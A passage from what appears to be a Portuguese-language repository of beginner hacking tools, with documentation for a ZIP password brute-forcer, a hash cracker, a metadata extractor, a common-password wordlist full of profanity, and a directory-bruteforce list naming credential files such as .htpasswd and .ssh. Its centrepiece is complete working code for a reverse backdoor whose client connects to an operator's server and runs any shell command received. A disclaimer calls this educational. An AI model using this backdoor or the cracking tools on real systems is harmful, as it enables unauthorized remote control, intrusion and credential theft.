89 | python client.py 90 | ``` 91 | 3. Insira o caminho do arquivo a ser enviado ou digite `sair` para encerrar a conexão. 92 | 93 | --- 94 | 95 | ## ⚙️ Requisitos 96 | 97 | - Python 3.6 ou superior. 98 | - Conexão em rede entre o cliente e o servidor (podem ser executados na mesma máquina para testes). 99 | 100 | --- 101 | 102 | ## 📌 Observações 103 | 104 | - Certifique-se de que os arquivos enviados não ultrapassem o tamanho máximo de 100 MB (ajustável na variável `MAX_FILE_SIZE` no cliente). 105 | - Verifique se a porta `5000` está disponível e não bloqueada pelo firewall. 106 | - O script do servidor cria automaticamente o diretório `recebidos/` caso ele não exista. 107 | 108 | --- -------------------------------------------------------------------------------- /zipkiller_pt/understand_code.md: -------------------------------------------------------------------------------- 1 | # Script de Quebra de Senha de Arquivos ZIP 2 | 3 | Este script utiliza as bibliotecas `pyzipper` e `tqdm` para realizar ataques de força bruta em arquivos ZIP protegidos por senha. Ele itera sobre uma lista de senhas (wordlist) tentando desbloquear o arquivo. O objetivo é identificar a senha correta que permite extrair o conteúdo do arquivo ZIP. 4 | 5 | --- 6 | 7 | ## 📋 Visão Geral do Script 8 | 9 | ### 🚀 Funcionamento 10 | O script segue as etapas principais: 11 | 1. **Leitura do Caminho do Arquivo ZIP e da Wordlist**: 12 | - Os caminhos do arquivo ZIP e da wordlist são passados como argumentos ao script na linha de comando. 13 | 2. **Leitura das Senhas da Wordlist**: 14 | - As senhas do arquivo da wordlist são carregadas em uma lista. 15 | 3. **Ataque de Força Bruta**: 16 | - Utilizando a biblioteca `pyzipper`, o script tenta extrair o conteúdo do arquivo ZIP usando cada senha da lista. 17 | - A biblioteca `tqdm` fornece uma barra de progresso para acompanhar o andamento do ataque. 18 | 4. **Resultado**: 19 | - Caso uma senha válida seja encontrada, ela é exibida no terminal. 20 | - Caso contrário, o script termina sem sucesso. 21 | 22 | --- 23 | 24 | ## 📂 Estrutura do Código 25 | 26 | ### 🔧 Função: `crack_zip(passwords_list, zip_file_path)` 27 | Essa é a função principal do script. Ela realiza o processo de força bruta no arquivo ZIP. 28 | 29 | - **Parâmetros**: 30 | - `passwords_list` (list): Uma lista contendo as senhas que serão testadas. 31 | - `zip_file_path` (str): O caminho do arquivo ZIP que será analisado. 32 | 33 | - **Fluxo da Função**: 34 | 1. **Abre o Arquivo ZIP**: 35 | Utiliza o `pyzipper.AESZipFile` para abrir o arquivo ZIP no modo de leitura. 36 | 2. **Iteração sobre a Wordlist**: 37 | A barra de progresso `tqdm` é usada para iterar sobre a lista de senhas. Para cada senha: 38 | - O script tenta extrair o conteúdo do ZIP com a senha atual. 39 | - Caso a senha esteja correta, o processo é interrompido e a senha é exibida. 40 | - Se a senha falhar, ocorre um tratamento de exceções para ignorar erros e continuar. 41 | 3. **Exibe a Senha Encontrada**: 42 | Quando a senha correta é identificada, ela é exibida no terminal com a mensagem `[!] PASSWORD: `. 43 | 44 | ### 🔧 Bloco Principal: `if __name__ == "__main__":` 45 | Este é o ponto de entrada do script, onde as entradas do usuário são tratadas e a função principal é chamada. 46 | 47 | - **Parâmetros Recebidos**: 48 | - `sys.argv[1]`: Caminho do arquivo ZIP. 49 | - `sys.argv[2]`: Caminho da wordlist. 50 | 51 | - **Etapas**: 52 | 1. **Carrega a Wordlist**: 53 | Lê as senhas do arquivo especificado em `sys.argv[2]`, removendo quebras de linha. 54 | 2. **Chama a Função `crack_zip`**: 55 | Passa a lista de senhas e o caminho do arquivo ZIP para a função de quebra. 56 | 3. **Finaliza**: 57 | Caso nenhuma senha seja encontrada, uma mensagem será exibida no terminal. 58 | 59 | --- 60 | 61 | ## 📚 Bibliotecas Utilizadas 62 | 63 | ### 1. `pyzipper` 64 | - Biblioteca para manipulação de arquivos ZIP com suporte a criptografia AES. 65 | - Permite abrir, ler, escrever e extrair arquivos ZIP protegidos por senha. 66 | - Site: [pyzipper](https://pypi.org/project/pyzipper/) 67 | 68 | ### 2. `tqdm` 69 | - Fornece barras de progresso personalizáveis. 70 | - Usada para exibir o progresso durante o ataque de força bruta. 71 | - Site: [tqdm](https://tqdm.github.io/) 72 | 73 | ### 3. `sys` 74 | - Biblioteca padrão do Python usada para capturar os argumentos da linha de comando. 75 | 76 | --- 77 | 78 | ## ⚙️ Como Utilizar o Script 79 | 80 | 1. **Pré-requisitos**: 81 | - Python 3.6 ou superior. 82 | - Instale as bibliotecas necessárias: 83 | ```bash 84 | pip install pyzipper tqdm 85 | ``` 86 | 87 | 2. **Prepare a Wordlist**: 88 | - Crie ou baixe um arquivo `.txt` contendo uma lista de senhas, uma por linha. 89 | 90 | 3. **Execute o Script**: 91 | - Use o terminal para executar o script. A sintaxe é: 92 | ```bash 93 | python script.py 94 | ``` 95 | 96 | - Exemplo: 97 | ```bash 98 | python script.py arquivo.zip senhas.txt 99 | ``` 100 | 101 | 4. **Resultado**: 102 | - Se uma senha válida for encontrada, ela será exibida no terminal: 103 | ``` 104 | [!] PASSWORD: minha_senha 105 | ``` 106 | 107 | --- 108 | 109 | ## ⚠️ Observações 110 | 111 | - **Responsabilidade**: Este script é apenas para fins educacionais. Certifique-se de usá-lo apenas em arquivos para os quais você possui permissão legal. 112 | - **Limitações**: 113 | - Apenas arquivos ZIP com criptografia compatível com `pyzipper` podem ser processados. 114 | - O desempenho depende do tamanho da wordlist e da complexidade da senha. 115 | 116 | --- 117 | 118 | ## 🛠️ Possíveis Melhorias 119 | 120 | - Adicionar suporte para multithreading ou multiprocessing para aumentar a velocidade. 121 | - Implementar um limite para o número de tentativas em arquivos ZIP grandes. 122 | - Criar uma interface gráfica para facilitar o uso. 123 | 124 | --- 125 | 126 | ## 📞 Suporte 127 | Caso tenha dúvidas ou precise de suporte, sinta-se à vontade para entrar em contato. 128 | 129 | --- 130 | -------------------------------------------------------------------------------- /revershell_simple_pt/understand_the_code.txt: -------------------------------------------------------------------------------- 1 | # Cliente-Servidor em Python 2 | 3 | Este projeto implementa um **backdoor reverso** básico em Python, onde o cliente se conecta ao servidor e permite a execução remota de comandos no sistema do cliente. Este README fornece uma explicação detalhada de ambos os scripts e instruções para uso. 4 | 5 | ## **Scripts** 6 | 7 | ### **1. Script Cliente (`client.py`)** 8 | 9 | #### **Função** 10 | O cliente conecta-se ao servidor, aguarda comandos, executa-os no sistema local e retorna os resultados. 11 | 12 | #### **Principais Componentes** 13 | - **Conexão com o servidor**: O cliente utiliza o endereço IP e a porta do servidor para se conectar. 14 | - **Execução de comandos**: Os comandos recebidos do servidor são executados localmente usando `subprocess`. 15 | - **Retorno de resultados**: O cliente envia a saída do comando executado e o diretório de trabalho atual de volta ao servidor. 16 | 17 | #### **Código Resumido** 18 | ```python 19 | import socket 20 | import os 21 | import subprocess 22 | import sys 23 | 24 | SERVER_HOST = sys.argv[1] 25 | SERVER_PORT = 4500 26 | BUFFER_SIZE = 1024 * 128 27 | SEPARATOR = "" 28 | 29 | sockt_ = socket.socket() 30 | sockt_.connect((SERVER_HOST, SERVER_PORT)) 31 | 32 | cwd = os.getcwd() 33 | sockt_.send(cwd.encode()) 34 | 35 | while True: 36 | command = sockt_.recv(BUFFER_SIZE).decode() 37 | splited_command = command.split() 38 | if command.lower() == "exit": 39 | break 40 | if splited_command[0].lower() == "cd": 41 | try: 42 | os.chdir(' '.join(splited_command[1:])) 43 | except FileNotFoundError as e: 44 | output = str(e) 45 | else: 46 | output = "" 47 | else: 48 | output = subprocess.getoutput(command) 49 | cwd = os.getcwd() 50 | message = f"{output}{SEPARATOR}{cwd}" 51 | sockt_.send(message.encode()) 52 | 53 | sockt_.close() 54 | ``` 55 | 56 | --- 57 | 58 | ### **2. Script Servidor (`server.py`)** 59 | 60 | #### **Função** 61 | O servidor aceita conexões de clientes, envia comandos e recebe os resultados. 62 | 63 | #### **Principais Componentes** 64 | - **Escuta por conexões**: O servidor ouve na porta especificada para conexões de clientes. 65 | - **Envio de comandos**: Os comandos são digitados pelo operador e enviados ao cliente. 66 | - **Recebimento de resultados**: O servidor exibe a saída dos comandos e mantém o diretório de trabalho atualizado. 67 | 68 | #### **Código Resumido** 69 | ```python 70 | import socket 71 | 72 | SERVER_HOST = "0.0.0.0" 73 | SERVER_PORT = 4500 74 | BUFFER_SIZE = 1024 * 128 75 | SEPARATOR = "" 76 | 77 | sockt_ = socket.socket() 78 | sockt_.bind((SERVER_HOST, SERVER_PORT)) 79 | sockt_.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) 80 | sockt_.listen(5) 81 | 82 | print(f"[!] LISTENING IN {SERVER_HOST}:{SERVER_PORT} [!]") 83 | 84 | client_socket, client_address = sockt_.accept() 85 | print(f"\n[!] {client_address[0]}:{client_address[1]} CONNNECTED") 86 | 87 | cwd = client_socket.recv(BUFFER_SIZE).decode() 88 | print("[#] YOU ARE HERE:", cwd) 89 | 90 | while True: 91 | command = input(f"{cwd} $> ") 92 | if not command.strip(): 93 | continue 94 | client_socket.send(command.encode()) 95 | if command.lower() == "exit": 96 | break 97 | output = client_socket.recv(BUFFER_SIZE).decode() 98 | results, cwd = output.split(SEPARATOR) 99 | print(results) 100 | 101 | client_socket.close() 102 | sockt_.close() 103 | ``` 104 | 105 | --- 106 | 107 | ## **Funcionamento Geral** 108 | 109 | 1. **Servidor** 110 | - O servidor é iniciado e aguarda conexões de clientes. 111 | - Após conectar, o servidor envia comandos para serem executados no cliente. 112 | 113 | 2. **Cliente** 114 | - O cliente conecta-se ao servidor e aguarda comandos. 115 | - Executa os comandos recebidos e retorna a saída junto ao diretório de trabalho atual. 116 | 117 | 3. **Comunicação** 118 | - Ambos os scripts utilizam um `SEPARATOR` para separar a saída dos comandos e o diretório de trabalho atual. 119 | 120 | --- 121 | 122 | ## **Instruções de Uso** 123 | 124 | ### **Executando o Servidor** 125 | 1. Salve o script `server.py`. 126 | 2. Execute-o em uma máquina ou servidor: 127 | ```bash 128 | python server.py 129 | ``` 130 | 131 | ### **Executando o Cliente** 132 | 1. Salve o script `client.py`. 133 | 2. Execute-o em outra máquina, fornecendo o IP do servidor: 134 | ```bash 135 | python client.py 136 | ``` 137 | 138 | ### **Interagindo** 139 | - O servidor pode enviar qualquer comando shell ou terminal (como `ls`, `pwd`, `cd`, etc.). 140 | - Para encerrar a conexão, envie o comando `exit` no terminal do servidor. 141 | 142 | --- 143 | 144 | ## **Aviso Importante** 145 | - **Uso Ético**: Este projeto tem como objetivo educacional e de aprendizado. Não utilize este código para invadir, comprometer ou explorar sistemas sem autorização explícita. Tal uso é ilegal e antiético. 146 | - **Ambientes Controlados**: Execute este código apenas em ambientes controlados, como laboratórios próprios ou máquinas virtuais. 147 | 148 | --- 149 | 150 | ## **Recursos Úteis** 151 | - [Documentação do Python: socket](https://docs.python.org/3/library/socket.html) 152 | - [Uso de subprocess](https://docs.python.org/3/library/subprocess.html) 153 | 154 | --- 155 | 156 | ## **Licença** 157 | Este projeto é fornecido "como está", sem garantia de qualquer tipo. Use por sua conta e risco. 158 | -------------------------------------------------------------------------------- /metadata_pt/understand_code_metada_pt.md: -------------------------------------------------------------------------------- 1 | 2 | # Detalhamento Técnico do Script 3 | 4 | Este script tem o objetivo de extrair e exibir metadados de arquivos de imagem (JPG, PNG, BMP, GIF, TIFF) e PDF. Ele utiliza a biblioteca `PIL` (Python Imaging Library) para imagens e a biblioteca `pikepdf` para PDFs. Além disso, o script pode ser executado a partir da linha de comando, recebendo o caminho de um arquivo como argumento. 5 | 6 | ## Dependências 7 | 8 | - **sys**: Biblioteca padrão para manipulação de parâmetros de linha de comando e funções do sistema. 9 | - **pprint**: Biblioteca padrão para imprimir objetos de forma mais legível (por exemplo, dicionários). 10 | - **PIL** (Python Imaging Library, também conhecida como Pillow): Biblioteca para abrir, manipular e salvar arquivos de imagem. 11 | - **pikepdf**: Biblioteca para manipulação de arquivos PDF. 12 | 13 | ## Funções 14 | 15 | ### 1. `get_image_metadata(image_file)` 16 | Essa função tem como objetivo extrair metadados de uma imagem fornecida como argumento. 17 | 18 | #### Passos da função: 19 | 20 | 1. **Abrir a imagem**: 21 | - `image = Image.open(image_file)`: Abre a imagem no caminho especificado. 22 | 23 | 2. **Criar dicionário com informações básicas da imagem**: 24 | - `info_dict = { ... }`: A função cria um dicionário com os seguintes dados básicos: 25 | - `Filename`: Nome do arquivo. 26 | - `Image Size`: Tupla com a altura e largura da imagem. 27 | - `Image Height`/`Image Width`: Altura e largura da imagem. 28 | - `Image Format`: Formato da imagem (JPG, PNG, etc.). 29 | - `Image Mode`: Modo de cor da imagem (RGB, L, etc.). 30 | - `Image is Animated`: Se a imagem é animada (ex.: GIFs). 31 | - `Frames in Image`: Número de quadros na animação (se for uma imagem animada). 32 | 33 | 3. **Obter metadados EXIF**: 34 | - `exifdata = image.getexif()`: Obtém os dados EXIF da imagem, que são metadados armazenados na própria imagem. 35 | - O script percorre cada tag de EXIF e adiciona ao dicionário `info_dict`. 36 | - **Conversão de dados EXIF**: 37 | - Se o valor de uma tag EXIF for um objeto `bytes`, ele é decodificado para uma string com `data.decode()`. 38 | 39 | 4. **Retorno**: 40 | - `return info_dict`: Retorna o dicionário `info_dict` com todos os metadados extraídos. 41 | 42 | ### 2. `get_pdf_metadata(pdf_file)` 43 | Essa função tem como objetivo extrair metadados de um arquivo PDF fornecido como argumento. 44 | 45 | #### Passos da função: 46 | 47 | 1. **Abrir o PDF**: 48 | - `pdf = pikepdf.Pdf.open(pdf_file)`: Abre o arquivo PDF especificado utilizando a biblioteca `pikepdf`. 49 | 50 | 2. **Retornar metadados**: 51 | - `return dict(pdf.docinfo)`: A função retorna os metadados do PDF como um dicionário, onde as chaves são os nomes dos metadados (como autor, título, etc.), e os valores são os respectivos valores desses metadados. 52 | 53 | 3. **Tratamento de exceções**: 54 | - Se houver um erro ao tentar abrir o PDF ou extrair seus metadados, ele captura a exceção e imprime a mensagem de erro: 55 | - `except Exception as e: print(f"Erro ao extrair metadados do PDF: {e}")`. 56 | 57 | 4. **Retorno**: 58 | - Caso haja erro ao abrir ou ler o PDF, um dicionário vazio é retornado `{}`. 59 | 60 | ### 3. Bloco `if __name__ == "__main__":` 61 | Este bloco garante que o script seja executado apenas quando for chamado diretamente da linha de comando. 62 | 63 | #### Passos da execução: 64 | 65 | 1. **Obter o arquivo a partir dos argumentos**: 66 | - `file = sys.argv[1]`: O caminho do arquivo é passado como argumento na linha de comando. O script pega o primeiro argumento (`sys.argv[1]`), que é o arquivo a ser analisado. 67 | 68 | 2. **Verificar a extensão do arquivo**: 69 | - `if file.endswith(".pdf")`: Se o arquivo for um PDF (baseado na extensão `.pdf`), a função `get_pdf_metadata` é chamada e os metadados são exibidos. 70 | - `elif file.lower().endswith((".jpg", ".jpeg", ".png", ".bmp", ".gif", ".tiff"))`: Se o arquivo for uma imagem (uma das extensões especificadas), a função `get_image_metadata` é chamada e os metadados são exibidos. 71 | 72 | 3. **Formato de arquivo não suportado**: 73 | - `else: print(f"Unsupported file format: {file}")`: Se o arquivo não for nem um PDF nem uma imagem, é exibida uma mensagem informando que o formato não é suportado. 74 | 75 | ## Execução 76 | 77 | 1. O script é executado a partir da linha de comando passando o caminho de um arquivo: 78 | ```bash 79 | python script.py caminho/para/arquivo.pdf 80 | ``` 81 | 82 | 2. Dependendo do tipo de arquivo (imagem ou PDF), ele irá chamar a função apropriada e exibir os metadados ou uma mensagem de erro caso o formato seja desconhecido. 83 | 84 | ## Exemplo de Saída 85 | 86 | - Para um **PDF**, o retorno pode ser algo assim: 87 | ```json 88 | {'/Title': 'Example PDF', 89 | '/Author': 'John Doe', 90 | '/Creator': 'Python Script', 91 | '/Producer': 'pikepdf 1.18.1'} 92 | ``` 93 | 94 | - Para uma **imagem**, a saída pode ser: 95 | ```json 96 | { 97 | 'Filename': 'example.jpg', 98 | 'Image Size': (1920, 1080), 99 | 'Image Height': 1080, 100 | 'Image Width': 1920, 101 | 'Image Format': 'JPEG', 102 | 'Image Mode': 'RGB', 103 | 'Image is Animated': False, 104 | 'Frames in Image': 1, 105 | 'Make': 'Canon', 106 | 'Model': 'EOS 5D Mark III', 107 | ... 108 | } 109 | ``` 110 | 111 | ## Conclusão 112 | 113 | Este script é útil para obter informações sobre arquivos PDF e imagens de maneira simples e rápida. Ele pode ser ampliado para outros tipos de arquivos ou ajustado para capturar metadados adicionais conforme necessário. 114 | -------------------------------------------------------------------------------- /pdf_killer_pt/wordlist_passwd.txt: -------------------------------------------------------------------------------- 1 | password 2 | 123456 3 | 12345678 4 | 1234 5 | qwerty 6 | 12345 7 | dragon 8 | pussy 9 | baseball 10 | football 11 | letmein 12 | monkey 13 | 696969 14 | abc123 15 | mustang 16 | michael 17 | shadow 18 | master 19 | jennifer 20 | 111111 21 | 2000 22 | jordan 23 | superman 24 | harley 25 | 1234567 26 | fuckme 27 | hunter 28 | fuckyou 29 | trustno1 30 | ranger 31 | buster 32 | thomas 33 | tigger 34 | robert 35 | soccer 36 | fuck 37 | batman 38 | test 39 | pass 40 | killer 41 | hockey 42 | george 43 | charlie 44 | andrew 45 | michelle 46 | love 47 | sunshine 48 | jessica 49 | asshole 50 | 6969 51 | pepper 52 | daniel 53 | access 54 | 123456789 55 | 654321 56 | joshua 57 | maggie 58 | starwars 59 | silver 60 | william 61 | dallas 62 | yankees 63 | 123123 64 | ashley 65 | 666666 66 | hello 67 | amanda 68 | orange 69 | biteme 70 | freedom 71 | computer 72 | sexy 73 | thunder 74 | nicole 75 | ginger 76 | heather 77 | hammer 78 | summer 79 | corvette 80 | taylor 81 | fucker 82 | austin 83 | 1111 84 | merlin 85 | matthew 86 | 121212 87 | golfer 88 | cheese 89 | princess 90 | martin 91 | chelsea 92 | patrick 93 | richard 94 | diamond 95 | yellow 96 | bigdog 97 | secret 98 | asdfgh 99 | sparky 100 | cowboy 101 | camaro 102 | anthony 103 | matrix 104 | falcon 105 | iloveyou 106 | bailey 107 | guitar 108 | jackson 109 | purple 110 | scooter 111 | phoenix 112 | aaaaaa 113 | morgan 114 | tigers 115 | porsche 116 | mickey 117 | maverick 118 | cookie 119 | nascar 120 | peanut 121 | justin 122 | 131313 123 | money 124 | horny 125 | samantha 126 | panties 127 | steelers 128 | joseph 129 | snoopy 130 | boomer 131 | whatever 132 | iceman 133 | smokey 134 | gateway 135 | dakota 136 | cowboys 137 | eagles 138 | chicken 139 | dick 140 | black 141 | zxcvbn 142 | please 143 | andrea 144 | ferrari 145 | knight 146 | hardcore 147 | melissa 148 | compaq 149 | coffee 150 | booboo 151 | bitch 152 | johnny 153 | bulldog 154 | xxxxxx 155 | welcome 156 | james 157 | player 158 | ncc1701 159 | wizard 160 | scooby 161 | charles 162 | junior 163 | internet 164 | bigdick 165 | mike 166 | brandy 167 | tennis 168 | blowjob 169 | banana 170 | monster 171 | spider 172 | lakers 173 | miller 174 | rabbit 175 | enter 176 | mercedes 177 | brandon 178 | steven 179 | fender 180 | john 181 | yamaha 182 | diablo 183 | chris 184 | boston 185 | tiger 186 | marine 187 | chicago 188 | rangers 189 | gandalf 190 | winter 191 | bigtits 192 | barney 193 | edward 194 | raiders 195 | porn 196 | badboy 197 | blowme 198 | spanky 199 | bigdaddy 200 | johnson 201 | chester 202 | london 203 | midnight 204 | blue 205 | fishing 206 | 000000 207 | hannah 208 | slayer 209 | 11111111 210 | rachel 211 | sexsex 212 | redsox 213 | thx1138 214 | asdf 215 | marlboro 216 | panther 217 | zxcvbnm 218 | arsenal 219 | oliver 220 | qazwsx 221 | mother 222 | victoria 223 | 7777777 224 | jasper 225 | angel 226 | david 227 | winner 228 | crystal 229 | golden 230 | butthead 231 | viking 232 | jack 233 | iwantu 234 | shannon 235 | murphy 236 | angels 237 | prince 238 | cameron 239 | girls 240 | madison 241 | wilson 242 | carlos 243 | hooters 244 | willie 245 | startrek 246 | captain 247 | maddog 248 | jasmine 249 | butter 250 | booger 251 | angela 252 | golf 253 | lauren 254 | rocket 255 | tiffany 256 | theman 257 | dennis 258 | liverpoo 259 | flower 260 | forever 261 | green 262 | jackie 263 | muffin 264 | turtle 265 | sophie 266 | danielle 267 | redskins 268 | toyota 269 | jason 270 | sierra 271 | winston 272 | debbie 273 | giants 274 | packers 275 | newyork 276 | jeremy 277 | casper 278 | bubba 279 | 112233 280 | sandra 281 | lovers 282 | mountain 283 | united 284 | cooper 285 | driver 286 | tucker 287 | helpme 288 | fucking 289 | pookie 290 | lucky 291 | maxwell 292 | 8675309 293 | bear 294 | suckit 295 | gators 296 | 5150 297 | 222222 298 | shithead 299 | fuckoff 300 | jaguar 301 | monica 302 | fred 303 | happy 304 | hotdog 305 | tits 306 | gemini 307 | lover 308 | xxxxxxxx 309 | 777777 310 | canada 311 | nathan 312 | victor 313 | florida 314 | 88888888 315 | nicholas 316 | rosebud 317 | metallic 318 | doctor 319 | trouble 320 | success 321 | stupid 322 | tomcat 323 | warrior 324 | peaches 325 | apples 326 | fish 327 | qwertyui 328 | magic 329 | buddy 330 | dolphins 331 | rainbow 332 | gunner 333 | 987654 334 | freddy 335 | alexis 336 | braves 337 | cock 338 | 2112 339 | 1212 340 | cocacola 341 | xavier 342 | dolphin 343 | testing 344 | bond007 345 | member 346 | calvin 347 | voodoo 348 | 7777 349 | samson 350 | alex 351 | apollo 352 | fire 353 | tester 354 | walter 355 | beavis 356 | voyager 357 | peter 358 | porno 359 | bonnie 360 | rush2112 361 | beer 362 | apple 363 | scorpio 364 | jonathan 365 | skippy 366 | sydney 367 | scott 368 | red123 369 | power 370 | gordon 371 | travis 372 | beaver 373 | star 374 | jackass 375 | flyers 376 | boobs 377 | 232323 378 | zzzzzz 379 | steve 380 | rebecca 381 | scorpion 382 | doggie 383 | legend 384 | ou812 385 | yankee 386 | blazer 387 | bill 388 | runner 389 | birdie 390 | bitches 391 | 555555 392 | parker 393 | topgun 394 | asdfasdf 395 | heaven 396 | viper 397 | animal 398 | 2222 399 | bigboy 400 | 4444 401 | arthur 402 | baby 403 | private 404 | godzilla 405 | donald 406 | williams 407 | lifehack 408 | phantom 409 | dave 410 | rock 411 | august 412 | sammy 413 | cool 414 | brian 415 | platinum 416 | jake 417 | bronco 418 | paul 419 | mark 420 | frank 421 | heka6w2 422 | copper 423 | billy 424 | cumshot 425 | garfield 426 | senhafacil@123 427 | willow 428 | cunt 429 | little 430 | carter 431 | slut 432 | albert 433 | 69696969 434 | kitten 435 | super 436 | jordan23 437 | eagle1 438 | shelby 439 | america 440 | 11111 441 | jessie 442 | house 443 | free 444 | 123321 445 | chevy 446 | bullshit 447 | white 448 | broncos 449 | horney 450 | surfer 451 | nissan 452 | 999999 453 | saturn 454 | airborne 455 | elephant 456 | marvin 457 | shit 458 | action 459 | adidas 460 | qwert 461 | kevin 462 | 1313 463 | explorer 464 | walker 465 | police 466 | christin 467 | december 468 | benjamin 469 | wolf 470 | sweet 471 | therock 472 | -------------------------------------------------------------------------------- /hashkiller_pt/understand_code.md: -------------------------------------------------------------------------------- 1 | # Documentação do Script Hash Killer 2 | 3 | ## Introdução 4 | 5 | Este script foi projetado para ajudar os usuários a "quebrar" ou encontrar o texto original de um determinado hash, comparando-o com entradas em uma wordlist. O script suporta vários tipos de hash, como MD5, SHA1, SHA256, entre outros. Abaixo está uma explicação detalhada de cada parte do script para ajudar você a entender sua funcionalidade e propósito. 6 | 7 | --- 8 | 9 | ## Explicação do Script 10 | 11 | ### **Importação de Bibliotecas** 12 | 13 | ```python 14 | import hashlib 15 | import argparse 16 | from colorama import init, Fore 17 | ``` 18 | 19 | - `hashlib`: Fornece acesso a vários algoritmos de hash e digest de mensagem. 20 | - `argparse`: Ajuda a interpretar argumentos passados pela linha de comando. 21 | - `colorama`: Habilita saída de texto colorido no terminal para um feedback visual melhor. 22 | 23 | ### **Função: `haskiller_mb_pt`** 24 | 25 | Esta função executa a lógica de quebra de hash. 26 | 27 | ```python 28 | def haskiller_mb_pt(hash_value, wordlist_path, hash_type, positive_c, negative_c, reset_c): 29 | ``` 30 | 31 | #### **Parâmetros:** 32 | - `hash_value`: O hash que você deseja quebrar. 33 | - `wordlist_path`: Caminho para o arquivo contendo os possíveis valores em texto simples. 34 | - `hash_type`: O tipo de hash usado para gerar o valor fornecido (por exemplo, MD5, SHA256). 35 | - `positive_c`, `negative_c`, `reset_c`: Códigos de cores para imprimir mensagens de sucesso, falha e texto padrão, respectivamente. 36 | 37 | #### **Seleção do Algoritmo de Hash** 38 | 39 | ```python 40 | hash_algorithms = { 41 | 'md5': hashlib.md5, 42 | 'sha1': hashlib.sha1, 43 | 'sha224': hashlib.sha224, 44 | 'sha256': hashlib.sha256, 45 | 'sha384': hashlib.sha384, 46 | 'sha512': hashlib.sha512, 47 | 'blake2b': hashlib.blake2b, 48 | 'blake2s': hashlib.blake2s, 49 | } 50 | ``` 51 | 52 | Este dicionário mapeia os nomes dos algoritmos de hash para suas respectivas funções em `hashlib`. Isso garante flexibilidade e permite a fácil adição de novos tipos de hash suportados por `hashlib`. 53 | 54 | #### **Validação do Algoritmo de Hash** 55 | 56 | ```python 57 | algorthm_name = hash_type.lower() 58 | if algorthm_name not in hash_algorithms: 59 | raise ValueError(f"[//] Algorithm {algorthm_name} not supported") 60 | ``` 61 | 62 | - Converte o tipo de hash para minúsculas e verifica se ele é suportado. Caso contrário, uma exceção `ValueError` é lançada. 63 | 64 | #### **Leitura do Arquivo Wordlist** 65 | 66 | ```python 67 | with open(fr'{wordlist_path}', 'r') as file: 68 | hash_function = hash_algorithms[algorthm_name] 69 | ``` 70 | 71 | - Abre o arquivo da wordlist em modo de leitura e atribui a função de hash apropriada com base no tipo selecionado. 72 | 73 | #### **Lógica de Comparação de Hash** 74 | 75 | ```python 76 | for line in file: 77 | word = line.strip() 78 | hash_done = hash_function(word.encode()).hexdigest() 79 | 80 | print(f"{reset_c}[TRY] {hash_value} X {hash_done}/{word} {reset_c}") 81 | 82 | if hash_done == hash_value: 83 | print(f"\n{positive_c}[FIND] {hash_value}/{word} X {hash_done}/{word} {reset_c}\n") 84 | return 85 | ``` 86 | 87 | - Itera sobre cada linha na wordlist. 88 | - Remove espaços extras e codifica a palavra antes de calcular seu hash. 89 | - Imprime cada tentativa de hash. 90 | - Se uma correspondência for encontrada, imprime a mensagem de sucesso e sai da função. 91 | 92 | #### **Tratamento de Erros** 93 | 94 | ```python 95 | except Exception as error: 96 | print(f"{negative_c}\n[ERROR] - {error} {reset_c}\n") 97 | ``` 98 | 99 | - Captura quaisquer erros que ocorram durante a execução e imprime uma mensagem de erro. 100 | 101 | --- 102 | 103 | ### **Bloco Principal de Execução** 104 | 105 | ```python 106 | if __name__ == "__main__": 107 | init() 108 | GREEN_COLOR = Fore.GREEN 109 | RESET_COLOR = Fore.RESET 110 | RED_COLOR = Fore.RED 111 | ``` 112 | 113 | - `init()`: Inicializa o `colorama` para habilitar a saída colorida. 114 | - Define códigos de cores para sucesso, falha e texto padrão. 115 | 116 | #### **Interpretação dos Argumentos** 117 | 118 | ```python 119 | parser = argparse.ArgumentParser(description="Hash Killer Script") 120 | parser.add_argument("--hash", required=True, help="The target hash to crack") 121 | parser.add_argument("--wordlist", required=True, help="Path to the wordlist file") 122 | parser.add_argument("--type", required=True, help="Type of the hash (e.g., md5, sha256)") 123 | 124 | args = parser.parse_args() 125 | ``` 126 | 127 | - Configura o script para aceitar argumentos da linha de comando para o hash alvo, o arquivo da wordlist e o tipo de hash. 128 | 129 | #### **Chamada da Função** 130 | 131 | ```python 132 | haskiller_mb_pt( 133 | hash_value=args.hash, 134 | wordlist_path=args.wordlist, 135 | hash_type=args.type, 136 | positive_c=GREEN_COLOR, 137 | negative_c=RED_COLOR, 138 | reset_c=RESET_COLOR, 139 | ) 140 | ``` 141 | 142 | - Passa os argumentos interpretados para a função `haskiller_mb_pt`. 143 | 144 | --- 145 | 146 | ## Instruções de Uso 147 | 148 | ### **Executando o Script** 149 | 150 | Para executar o script, use o seguinte formato de comando: 151 | 152 | ```bash 153 | python script_name.py --hash --wordlist --type 154 | ``` 155 | 156 | ### **Exemplo** 157 | 158 | ```bash 159 | python hashkiller.py --hash 5d41402abc4b2a76b9719d911017c592 --wordlist words.txt --type md5 160 | ``` 161 | 162 | --- 163 | 164 | ## Notas e Dicas 165 | 166 | 1. **Qualidade da Wordlist**: Certifique-se de que a wordlist contenha palavras relevantes para aumentar as chances de encontrar o texto original. 167 | 2. **Precisão do Tipo de Hash**: Forneça o tipo de hash correto; caso contrário, o script não funcionará. 168 | 3. **Tratamento de Erros**: Se encontrar erros, verifique os caminhos dos arquivos e os tipos de hash. 169 | 4. **Considerações de Desempenho**: Wordlists grandes podem desacelerar o script; considere usar hardware mais rápido ou bibliotecas otimizadas se necessário. 170 | 171 | --- 172 | 173 | ## Conclusão 174 | 175 | Este script demonstra um método básico, mas poderoso, para quebra de hashes usando Python. Ao aproveitar algoritmos de hash comuns e leitura eficiente de arquivos, ele serve como uma ferramenta prática para profissionais de segurança e entusiastas. 176 | -------------------------------------------------------------------------------- /test_ideas/direct_list.txt: -------------------------------------------------------------------------------- 1 | 2 | .bash_history 3 | .bashrc 4 | .cache 5 | .config 6 | .cvs 7 | .cvsignore 8 | .forward 9 | .git/HEAD 10 | .history 11 | .hta 12 | .htaccess 13 | .htpasswd 14 | .listing 15 | .listings 16 | .mysql_history 17 | .passwd 18 | .perf 19 | .profile 20 | .rhosts 21 | .sh_history 22 | .ssh 23 | .subversion 24 | .svn 25 | .svn/entries 26 | .swf 27 | .web 28 | @ 29 | _ 30 | _adm 31 | _admin 32 | _ajax 33 | _archive 34 | _assets 35 | _backup 36 | _baks 37 | _borders 38 | _cache 39 | _catalogs 40 | _code 41 | _common 42 | _conf 43 | _config 44 | _css 45 | _data 46 | _database 47 | _db_backups 48 | _derived 49 | _dev 50 | _dummy 51 | _files 52 | _flash 53 | _fpclass 54 